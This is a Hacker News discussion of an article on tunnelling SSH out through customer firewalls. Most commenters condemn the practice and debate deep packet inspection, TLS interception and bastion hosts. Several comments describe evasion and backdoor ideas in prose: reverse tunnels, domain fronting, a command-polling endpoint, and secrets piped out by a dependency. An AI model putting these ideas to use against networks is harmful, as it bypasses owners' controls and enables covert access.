Hacker News new | past | comments | ask | show | jobs | submit login
Firewall rules: not as secure as you think (haskellforall.com)
189 points by jnord 5 months ago | hide | past | favorite | 82 comments



This methods discussed in the article are how I have seen some hardware appliance vendors SSH into their devices despite the customer only allowing outbound connections to a cloud provider. I would call these out in security reviews and it would get political really fast as the team buying the device wanted this feature but the compliance team wanted the flows documented that would conflict with security policies and ultimately would cause an audit failure. It got even more interesting when one of the vendors was also a B2B customer. A firewall vendor claimed they could block anything inside that outbound HTTPS connection that was not HTTP but they could not. I will not be permitted to add specific details such as the appliance vendor or firewall vendor.

I would wager some companies don't even know that a vendor can SSH into the customer datacenter not just the device despite only allowing outbound HTTPS flows to a cloud provider.


I understand the technical issue but on a broader sense, the instant that a vendor supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor controlled endpoint, doesn't it immediately technically allows full remote control?

Lots of talk about tunneling and wrapping/disguising ssh but a vendor does not need any of that to control its machine.

For example you could have the on-prem host poll a "licensing" or "software update" server that also happens to reply with ad-hoc commands to execute on demand. Could be straight up shell commands and the result can be sent back. No need for ssh, long lived connections, reverse tunnels or anything.

The only way to mitigate this is to fully trust the vendor, have a strong legal framework to protect against wrongdoings or fully block all internet access to endpoints you don't fully control.


I understand where you are coming from and that it should be assumed a vendor box can do anything even without SSH. Other teams don't think this way however. "Oh its just outbound HTTPS, no inbound connections, totally fine" is the school of thought I was up against. Adding to this the box was expected to send hundreds of GB of logs to do "big-data" against daily to monitor it's health, thus training firewalls, IDS and humans to expect this outbound data volume, which could with the flip of a bit start exfiltrating customer data. If I told you what this box was for you would know how insane it would be to send more than 500KB per day for that purpose. It seems I share something in common with Boeing "line stoppers". There are details I wish I could share as they would drive home how insane this entire debacle was. I expect to read about it in the news some day.


This is always the problem with firewalls. If your adversary controls both ends of the connection then it's not outbound HTTPS traffic you're letting through. It's totally arbitrary two-way traffic that happens to be transmitted over a connection first established to port 443 on the remote host.

The only useful technical defence against this kind of deception today is deep packet inspection and a policy of blocking everything by default and only permitting through packets you can actively approve. But that becomes very expensive very quickly and there are practical limits on how far you can go. Ultimately if your adversary is willing to engage covertly in the kind of hacks mentioned in the article then they're probably also willing to engage in steganography to get past whatever DPI rules you can afford to run. Then you're back to square one and either you trust their device or you sandbox it.

In reality a more effective defence is probably the one involving contracts with severe penalties for this kind of behaviour and liability for any consequential losses.


This is a good point. I would expect that a device like a SAN is just sending telemetry/logs/diagnostics back to the mothership for support purposes. Having a a persistent tunnel kinda of sucks and I much prefer something like shell access being done over a remote support/screen sharing app so I can see what they are doing. Previous security fiascos like the Solarwinds hack come to mind and an attacker could have a foothold inside a trusted/internal network.


To be properly paranoid, I would allow the device to send telemetry and diagnostics, but only through my proxy. The outbound stream can be as encrypted as they want, but I will demand the ability to decode the answer, and decide whether I let it come back to the box.

I wonder how many vendors would agree to offer this, and how much more would t then cost.

(If you update software from the vendor's resource, all bets are off, because you just run their software which can do anything your security measures would not prevent it from doing. You have to very seriously trust the vendor of your OS, if you may be a high-value target.)


If you’re big enough, they will. One company fought it, so I stopped paying them and they found Jesus.


That is more of a case of that one vendor not having diverse enough customers. Not of your company being big.


Nah. I’ve seen similar stunts pulled off with companies like Microsoft.

Sales teams who believe a full funnel is in front of them are capable of incredible feats. You need to have the aircover and willingness to scorch the earth.


They claim to need telemetry and diagnostics but do they sell to DoD?

Their thing can run airgapped they just prefer to be a quasi SaaS because no one knows how to ship working software anymore.


But it's their device, you're installing it in your network - if they wanted to do something malicious, they would. If you shut down the tunneling method detailed in the article, they could just add an endpoint like:

GET /latest-command

that resolved to a shell script to be run periodically.

> start exfiltrating customer data

If it's data that they're supposed to have access to, they're already doing that. If it's data they're not supposed to have access to, the correct fix here is to DMZ the box they're installed on, not to try to (hopelessly) limit their outbound connectivity.


Sounds like a situation needing a whistleblower.


Hopefully not ending like the Boeing whistleblowers


>fully block all internet access to endpoints you don't fully control.

Not that all risk can be eliminated, but this simplifies management while reducing the attack surface area by orders of magnitude.

The good news is companies are increasingly doing it now that technology has finally caught up - now that implementing a private* network with each vendor (or a private extranet across all vendors) is actually viable and sensible.

* Usually a software-only, zero implicit trust overlay network


Are there overlay networks that are not software only?


All the cloud networks are software (defined network) a very long way down, far below what is exposed to customers, so any overlay is going to have to be software.

If you mean overlays that don't require an endpoint agent there are plenty of solutions that will orchestrate cloud native SDN control enforcement capabilities like AWS network ACLs or Azure NSGs rather then trying to handle enforcement on the resource directly with an agent.


I appreciate the response but I think you misunderstood my question. OP mentioned a "software-only, zero implicit trust overlay network". In my head all overlay networks are software only (and from your answer your conception too). I was trying to figure out why OP mentioned "software only"? Was it redundant or was it a useful way to distinguish between another category of overlay network.


> Are there overlay networks that are not software only?

In the defense and government security space there are 'hardware' overlay network devices. One common use is extending classified 'airgapped' networks over less secure networks or the internet. 'Inline Network Encryptor' is a generic term; 'Taclane' is one brand; HAIPE is I think an applicable NSA standard.


> I understand the technical issue but on a broader sense, the instant that a vendor supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor controlled endpoint, doesn't it immediately technically allows full remote control?

In the sense of "isn't it now possible on technical level?", yes.

On a legal level? You're breaking into their network. At least in the US, but almost certainly in many other jurisdictions), there's a very non-zero chance you're engaged in illegal activity. https://www.justice.gov/jm/jm-9-48000-computer-fraud

On a PR level? Definitely not. The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks. Even the helpdesk guys are gonna be telling their buddies over beers "you wouldn't believe what our netsec team caught our appliance from DumbassCo doing..."

That doesn't even get into the liabilities involved if the client has to meet security requirements from the government (as a contractor), PCI compliance, HIPPA compliance, SEC rules, etc. Imagine a client who needs compliance as a core part of their business because of your network appliance...

And then there's the liability if the remote access capability turns out to be a security vulnerability that can be exploited by outside parties, is abused by an employee, or hackers break into your company and jump off from there to your clients.

There is nothing difficult about respecting "no, you may not have remote access to our network or this system" with no reason or justification provided. They don't need to justify or explain it to you. It's their network. Change the support contract terms if necessary, but don't do anything the author idiotically suggests.

I see people claiming that "it should be assumed the vendor can access your network" - legally speaking, no, it sure shouldn't. That's like saying "if you buy a laptop with a camera and microphone you should assume the laptop manufacturer can spy on you."

If you work at a company that does this sort of nonsense, now would be an excellent time to deactivate any "hack our way into customer-owned equipment or networks" functionality and urgently schedule a meeting with some lawyers.


> The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks.

It wouldn't matter. People will bitch about it online for a few days and the company will make some lame PR statement about how sorry they are and that they'll take steps to prevent it from happening again but then everyone will move on to the next outrage and the company will continue to thrive.

Look at levono, they've repeatedly shipped computers with malware and backdoors, sometimes because they were being paid to, and people still buy them. How many times have router manufacturers included the most brain dead security flaws like hard coded passwords and backdoors? How many companies have leaked private data to the world? Wells Fargo fraudulently opened accounts. HSBC laundered money for terrorists. Microsoft and Amazon were caught illegally harvesting data on children. Philips and Johnson & Johnson outright murdered people by continuing to sell products they knew were giving people cancer. Nobody went out of business. Even CrowdStrike is still around. The most universally hated companies in the US are also among the most successful.


Cisco have been found to have hard coded credentials in their products .. how many times now?


I mean, couldn’t any semi popular, transitive dependency installed with <insert package manager here> do the same thing with a reverse tunnel? Imagine a simple go module that kicks off a background routine that just keeps a tunnel open with a direct call to os.exec. Seems like an easy way to cat env and pipe back secrets to the attacker


That's what I was thinking. Or any application at all. If MS word started doing this, how long would it take to recognise? Especially if it's only periodic and only some small percentage of their install base.


Yes.

This said there are a few companies that monitor this kind of stuff in 'popular' open source packages and provide services to their customers to block packages that do things like this. Unfortunately it's pretty expensive.


Seriously, there were fights over that?

In any remotely reasonable organization, that should be an instant, permanent blacklisting for the vendor, and termination of the "we will escort you to clean out your desk right now" variety for any internal employee who knew about it or enabled it. Probably with a line dropped to law enforcement.


That strikes me an example of how extremely unreasonable organization would behave, regardless of what it was in response to.


What reasonable company have you worked for before that had such an approach. The only place I could imagine it happening is at a boutique trading firm


> A firewall vendor claimed they could block anything inside that outbound HTTPS connection that was not HTTP but they could not.

This is very easily bypassed leveraging cert pinning. Modern firewalling is all predicted on MitM approach, nobody has any secret sauce here. If they can't see inside the encryption they really can't do much. Very few customers have decryption configured correctly, or at all, at scale.

Also an enterprise generally won't block connections that "aren't categorized" (URL blocklist) because it's too much work / headache Beyond that most good and bad actors have domains lying around that won't end up in blocked categories.

NGFW today are NGDS (Next Gen Door Stops), they aren't effective beyond controlling their own users. And at that rate DNS is a much more cost effective control.


>Also an enterprise generally won't block connections that "aren't categorized"

Depends where. I work with a lot of large enterprise and they absolutely do block everything. Anything leaving their data centers is proxied and allow listed by the proxy. If we tried to cert pin our application, it would immediately break in their environment and would not be allowed till it passed their policies.


There are still many ways around this. A proxy is only as good as what the administrators have thought of as bypass. Things like domain fronting are still easily leveraged. And most organizations won't touch financial websites with a 10-foot pole because of the legal obligation of potentially decrypting PII. It's not impossible to get a domain classified as financial with a bit of work.

The unfortunate reality is all it takes is one.


You mention a couple times that you can't give more details. Can you say why? NDA?


Multiple NDA's among other things.


Corkscrew, ohh that takes me back to the time I nearly got sacked. The GitHub repo is 8 years old but corkscrew is much older.

I was working at a big place at the time. I had a fairly extensive home lab. I used to practice data migrations on synthetic data at home, provoke failures in my safe home lab env then write scripts to automate the migration while catching all the gotchas I could think of (think disk space filling up mid-migration, that kinda thing).

Anyway, I was using ssh pre commands and netcat (corkscrew makes this way simpler to do, I didn’t learn about corkscrew until afterwards) to punch through from my desk at work to my lab at home so I could copy in my scripts. Big no-no but at the time that was not clear to me at all. I didn’t even consider I might be violating a rule.

They flew a couple of “security officers” to the office I worked at to give me the full shake down… ooops!

A frustrating thing was that the people they flew (at great expense, international flight) were not that technical, one was an ex-cop as I recall. Trying to explain what I was doing and how it worked was pretty tough! Actually the most frustrating thing from my point of view was in my mind I was showing initiative and doing all this free work outside of work and here I was getting threatened with dismissal…


Amusing that you patronize corporate security for not totally understanding what you were doing, but couldn't deduce tunneling home to grab your data exfiltration - i mean migration - scripts might not be kosher with security.


I didn't know the tool and it looks, interesting, I'll give it a try


This is billed as a means of selling customers on-prem stuff that you can remote-manage into with SSH despite firewall rules blocking SSH. You can do this. You can get a lot more sophisticated than the tricks outlined in this article to make it happen. It is very difficult for customers to prevent you from doing it. And, if you do it, you're going to get famous for doing it, when a customer that actually cares about your network security notices that you built a remote tunnel into their network.

I strongly advise anyone making product decisions to assume that none of these tricks work, and that there are no tricks you can use to build discreet remote management tunnels to devices (including hosts running your software) that have customer internal addresses assigned.


I've seen vendors offering this technique or similar, but making it "opt-in". For example, Okta Access Gateway used to perform a reverse tunnel out to an Okta managed IP, but you had to enable the "Support VPN" option on the device. https://help.okta.com/oag/en-us/content/topics/access-gatewa... Seems like they dropped the feature, not sure if from customer backlash, or their security engineering teams finally realizing that it's risky. However, it was at least documented, and customer toggleable.


I think that were I to implement anything like this I would document the capability explicitly.

The situation that seems useful to me is bypassing dysfunctional processes rather than circumventing inconvenient policies.

(and if the device in question can auto-apply updates so far as I can see being able to ssh into it rather than ship it an update that Does Something is more a question of how convenient it is to Do The Thing rather than adding any additional Things that it Can Do, though it's entirely possible I'm missing something important there)


For the SSH case mentioned in the article, `ssh -R` trick should already resolve some one-time contingencies (assuming SSH connection is not blocked).

But if you find yourself requesting `ssh -R` too often, maybe just ask those datacenter people to setup a proper SSH Bastion for you. There are opensource solutions and enterprise-level ones (Teleport for example: https://github.com/gravitational/teleport), some also allows you to do audit and access control, which maybe important if you work for a enterprise client.

The DIY solution described in the article literally punched a hole in the firewall. The firewall people might not like it.


Regarding SSH bastion hosts, apart from open-source and enterprise solutions that may add some valuable features, you can always get away with a properly configured SSH jump host using TcpForwarding to relay connections to the target host.


There is a problem on simple TcpForwarding: audition. Some SSH Bastion allows all input and output to be logged for later inspection and forensic while DIY solutions often just ignored it's importance.

Notice that I said "forensic"? Yeah, assuming some very unfortunate situation has occurred, police are called and there will be a full incident report on it, a DIY'ed apparatus without detailed logging records will make the deployer of that apparatus look really bad. This is especially true if you're a contractor, since your hirer might not fully trust you.

Also, at very least, you'll probably want to be mentioned as "the proficient and diligent from one of our employee/partner allowed us to collect detailed information on what the attacker has done on our systems" than "the lack of consideration on the use of remote access tool made it impossible for us to know what else the attacker has done". It's good for your resume.


Thorough auditing can still happen on the target host. If every single one of your hosts is properly configured to produce audit logs, maybe you can get away without auditing or even session recording on the SSH bastion host.


I can tell you that at scale, customers will notice this. They notice what DNS addresses you're hitting. They notice what outbound sockets you open. They notice the traffic patterns don't match the protocol you're putatively using. A given customer most likely will not, but there are networks out there where they're looking at pretty much every connection, and it only takes one bad interaction with one customer going to one press outlet for you to have a Bad Day. It's bad enough when the customer misunderstood something and you've got a good answer as to what is actually going on. You really don't want to be trying to do business in a scenario where you really were doing something like this.


> You (the vendor) can ask the customer to open their firewall for your software to communicate with the outside world (e.g. your own datacenter or third party services), but customers will usually be reluctant to open their firewall more than necessary.

Vendors that try tricks like this to work around the firewall team, as backlogged and inefficient as they are, will lose deals and credibility, 100% guaranteed. And I love ssh -R and stunnel, for what it's worth.

The easier way to get what you want is to get someone technical with political capital (they exist) to buy into what you're selling so that they can tell the firewall team to make exceptions during a trial period.


Just so that we are all on the same page, that is illegal and unethical

A customer might have demands which are opposing; that doesn't mean you should hack your customers with backdoors. These backdoors can also be used by others.

Although its neat trick that doesn't mean it's ethical or legal nor desirable.

Think of this what if each application/service you use would create backdoors to your servers/devices.


This is basically a ridiculous arms race between the people making rules and people that feel they are an exception to the rule. Can really suck when the reasoning on both ends is valid


The worst bit is where it's happening because neither side wants to just sit down discuss what's actually required and how to provide it securely.


"neither side"

This is not a coin, it's more like an octahedron.

You have the end user. You have the person at the company managing the application. You have networking team. You have the edge and firewall teams. You have the security team. You have a compliance team. You have the upper management looking at controlling costs.


I’ve had these types of conversations hundreds of times due to some architecture of various systems that I’ve worked on over the years. Mostly from the vendor side.

The only real way to combat this is to do Deep Packet Inspection (DPI) and then to look at all the data that’s being passed within that encrypted connection. The problem with this, is that at this point, the vendor has to trust that the customer is doing their due diligence to protect anything that they find within that associated connection with the same diligence that the vendor would be.

As a vendor specifically in the healthcare space, I can tell you that there is no way in hell that I am going to trust any of our customers to secure our data, more than ourselves. They will never know or understand all of the components and know where the risks lie better than the vendor.

For example, in the infancy of one of the companies that I worked at, I agreed with one of our customers to allow certificate pinning, and we would install their certificate on our servers which would allow them to inspect the traffic. Wouldn’t you know it, there was an issue where they were blocking some of our traffic that needed to go outbound, because of their deep packet inspection triggered some rule that they had enabled. Conveniently while they were pilfering through the data to troubleshoot the issue, they sent a bunch of the payloads that contained various API keys, tokens, etc. which were now just out there in the wild, that under our watch would never see the light of day.

Who knows where else those things are logged or what other places besides the 30 or so recipients that were on that email thread. As soon as we found out that they were not handling it appropriately, we took corrective actions, not only to replace the keys, but also to disallow that going forward. And this for context, is one of the biggest healthcare institutions in the United States.

I can confidently say that I have a strong security mindset and anything that gets built has security at the forefront of every release. You can’t trust people who aren’t liable for your systems, with your data, or even to protect their own data.

Maybe I am jaded, but the lesson I learned is that you shouldn’t trust anybody, and that chances are other people will not treat sensitive information with the same sensitivity that you will.


> The only real way to combat this is to do Deep Packet Inspection (DPI)

Snake oil. It's not possible to be sure what's really going on in a connection where somebody else controls both endpoints, full stop. That's what this whole post is about.

> As a vendor specifically in the healthcare space, I can tell you that there is no way in hell that I am going to trust any of our customers to secure our data, more than ourselves.

What are "your" data doing on a device you don't physically control, in a network you don't control at all, all under the supervision of somebody you don't believe should have access to those data? Anything on there is "in the wild" already. It should have no ability to affect anybody but that customer and information that that customer would have access to regardless.

The security mindset should be telling you that your whole system needs to be rearchitected.


In that sort of scenario, the appliance needs to be in a DMZ and treated like an external system.

Personally, this is why I hate systems that need this sort of connectivity beyond a SAN service processor or similar. I’d rather have the third party just run in on their premise with appropriate contracts than pretend it’s just another server in the datacenter.


Firewall. Because why fight hostile actors when you can just fight your teammates ?

Firewall and people behind them are actively hostile to the compagny. Those are relics from decades ago, when people could map the entire internet on their devices.

In 2024, this is nothing but a clown circus. They try to reconciliate an ever-changing world with a never-changing world. So they make exceptions, thousands of exceptions, everything becomes an exception.

And then, they think : hey, we are doing L3/L4, this is the issue ! We fail because we are not L7.

And the circus comes around: corporate TLS mitm. Massive project, custom certificates must be deployed in all and every compagny devices. Thus, exceptions, again more exceptions : what about this device ? We cannot add our certs here. Exception. Ha, this specific stuff cannot be mitmed (maybe they implemented certificate pinning ? good guys). No problem : exceptions !

On top on that, all this cruft is expensive as hell. So, we add more exceptions for stuff that is deemed "secure enough" : google meet / zoom / whatever. Various objects storages (s3 && friends). More exceptions.

At the end, you spent millions, ate thousands of FTE on the project. To build a massive amount of exceptions (which basically allows everything, indeed).

The worst is this: for every exception, you have someone, who wants to work for the compagny, who is blocked from doing this work, who have to wait, argue and beg to finally be allowed to work for the compagny.

(source: experience, I'm a network architect, worked for a couple of multi-billions-$ compagnies)


> Firewall ... And then, they think : hey, we are doing L3/L4, this is the issue ! We fail because we are not L7.

Outside of corporate firewalls, these fractals reappear at the scale of nation-state firewalls.

What do you think of "zero-trust" and "software-defined perimeter" approaches where every network connection is linked to identity and risk assessment?


100 %. Firewalls basically do nothing. If you are running vulnerable software, it won't help. If not, it's not helping, either. It basically only helps in the rare case that you have spectacularly misconfigured something. On the other hand, if a firewall is blocking automatic software updates, it's actually dramatically lessening security.


> exceptions (which basically allows everything, indeed)

No, that's not right.

You've allowed everything since the beginning. All the exceptions are for honest software, nothing malicious need it.


We basically have tunnel just to get our work done.

We host a number of services in China, serving the Chinese market, and our corporate firewall blocks our own access to them despite numerous requests to IT to resolve the issue.

We just use SSH to bounce off one of our ec2 instance to work on these.


This article talks about using squid. I wouldn't recommend Squid for this, as they're understaffed and took years to fix critical vulnerabilities I found[0].

Using ssh-over-https with ssh -R works wonders everywhere though. You could probably even make the ssh packets look like html so it's opaque to a mitm-proxy too.

The sort of firewalls this post is discussing are close to snake oil imo. Sure they help with automated script kiddie attacks and whatnot, but yes, if you control both ends, it's nearly always possible to connect back.

0: https://megamansec.github.io/Squid-Security-Audit/


Most security controls used in your average business can be bypassed by knowledgeable users with enough time.

The aim is to make things as hard as reasonably possible so you can tell your boss and regulators that you did your part.


The problem is, most organizations - particularly large ones, but following the advent of "cyber insurances" also more and more smaller ones - drown in byzantine bureaucracy and requirements that makes work excessively difficult.

Any organization depends on people willing to bend, stretch and bypass the rules where necessary - refusing to do so is considered to be a form of labor action [1].

[1] https://en.wikipedia.org/wiki/Work-to-rule


This is made to sound much more malicious than it is. Sometimes this techniques are used just because you don't want your product to have opened ports which could be potential entry points for uninvited guests. As far as the client knows about the connection and what it entails, it should be okay.

The product of my employer is remote monitoring and management so the nature of the product is to allow cloud visibility to a network and the reverse connection is actually improving security.


This makes me grimace. I recall trying to install an SSL cert inside a very restricted environment. I had to build a special mode into our application so the IT person could use cURL to hit an endpoint with the base64'ed cert, and then scan the log files for the chunks and then reassemble them by hand with vi. Imagine coaching someone to use VI and bash and grep who only knows how to click around in Windows, everyone feels like a complete idiot. They completely disabled all ports other than HTTPS, did not allow copy-paste into the VM. Inbound HTTP was disabled (so no wget, can't even install extra software with yum). What a nightmare.

The irony of these locked down environments is that they are put in place by crusty IT people who have good intentions, but also know it helps them keep their jobs. But, because of it, all the on-premise software is moving to the cloud, and those people are going to lose their jobs anyway.

This was a sad realization I found after years of enterprise sales work. I thought on-premise software could give us an advantage because as a small company you can offer a more bespoke experience. But, we always looked bad because everyone fights to protect their fiefdom, and our software was blocked at every turn.

It is crazy that enterprises are moving everything to the cloud and no one is noticing that the barrier to getting access to their private sensitive data is more or less water vapor, so to speak. That's nuts.


Which is why you need a modern firewall that MitMs both TLS and SSH. Not hard to do these days.


I don't think a modern firewall can MiTM HTTPS TLS without triggering a "Warning: Potential Security Risk Ahead" (Firefox) or "Your connection is not private" (Chrome).

Edit: typo


I don't think _any_ firewall can MITM traffic without this happening unless you install the appropriate certificate in each client machine's trust store. I bet that with the advent of such all-in-one solutions as Fortinet or Cisco VPNs that this would be handled automatically. If not I'm sure an endpoint management solution could be coaxed into doing this via some glue scripts. I haven't been an "IT guy" in a decade-plus but I'd be surprised if this wasn't within reach fairly easily these days.


Sophos does that in fact. I did a double take when I noticed my domains weren't signed by let's encrypt on my work machine.


Yeah, that's what the IT at my company did. Installed Zscaler, rolled out a new root cert to Chrome, and then told people to configure the remaining apps they use to use the organization's root cert.


Which is why corporates who do this also use MDM to ensure that certs for the firewall/reverse proxy are installed on endpoints, RADIUS at network access points to authenticate devices by certificates and endpoint protection software to send nasty-grams if you fuck around.


That’s been my experience. The difference being in a corporate environment they can push policies to all employee endpoints that make this happen with no scary warning (trust the internal CA, etc).


Regarding SSH, the MitM would generate a new host key for the actual host you try to connect to. meaning when the MitM existed in the first place and you trusted the host key then (adding it to your Known_hosts), you will not get any additional security warning.

This can of course be avoided by the organization by distributing host keys to the client beforehand as they (maybe) would if the host keys were the actual keys from the host stored in /etc/ssh.


Correct. Companies that implement such a firewall must also install their own trust stores on the machines on the network. This can be a problem when you try to use some software that uses its own trust store from a public source like Mozilla (e.g. Python libraries).

It really makes you think how much your security hinges on that trust store yet it's something most people aren't even aware exists, let alone inspected themselves.


Pretty sure you still can, it just requires that the client system trusts the CA being used to sign the MITM certs. That obviously limits the cases where it works, but not to zero.


Because this has been abused, a lot of (mobile) apps use certificate pinning and will not accept MITM, even with a custom CA installed.


I don't for a moment believe that that's the reason (more likely, it's the apps trying to prevent reverse engineering), but yes, there's a bit of a cat/mouse game where you can read traffic but HTTPS prevents that but you can add a custom CA but apps can pin certs but you can modify the app to fix that. But I suspect that for the appliance case, a business can just require that the vendor allow a custom CA and block any traffic they can't decrypt.


In cases where I trust both the communication endpoints, e.g. an employee trying to SSH into an internal host, "trust" being established by other parameters that are not relevant to the firewall, why would I MitM such a connection?

At work I use a VPN to access the internal network, I then have to traverse multiple firewalls and a MitM breaking up my SSH connection in order to connect to a host running a webserver.

I have yet to understand how the MitM would increase security. Extra (well minus) points if the appliance in question auto-updates from the vendor's repository, offering no insight into the inner workings.


Do they always work? Can't they pin certs?


They can pin certs, but at least you know that you can't see that traffic and make a policy decision about allowing it anyways or trying to force the vendor to drop it.


The next level is to have another layer of encryption and wrap that in the TLS/SSH, and maybe use steganography to make it appear legitimate. Much harder to detect.


That stuff fundamentally does not work against anybody with enough of a clue to be playing tunneling games (or using ssh) in the first place. If you have any significant control over both ends of the connection, then it's trivial to obfuscate anything you want so that the firewall can't detect it.

... and those boxes, all of them, have a really bad history of security bugs themselves.

The risks you're taking by undermining the cryptography and putting random unnecessary devices in positions of trust are almost always greater than the risks you mitigate. What you're really buying with those devices is the illusion of control and/or the ability to claim you "tried".


Just to be pendantic, a malicious user could write a script / program that implements tunneling but doesn't use the OS provided certificates.

But yeah that's definitely a best practice.


The article says that Squid can only do HTTP, and suggests to add a reverse proxy in front of Squid for HTTPS, but doesn't Squid support HTTPS itself via "SSL bump"?


Doesn't tailscale also do similar thing where you never open any port in your server but you can still SSH into it as long as the daemon is running on the server?


I don't think repeatedly referring to gaining unauthorised access to a network as a "trick" would trick a judge (or corporate lawyers) much at all...




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: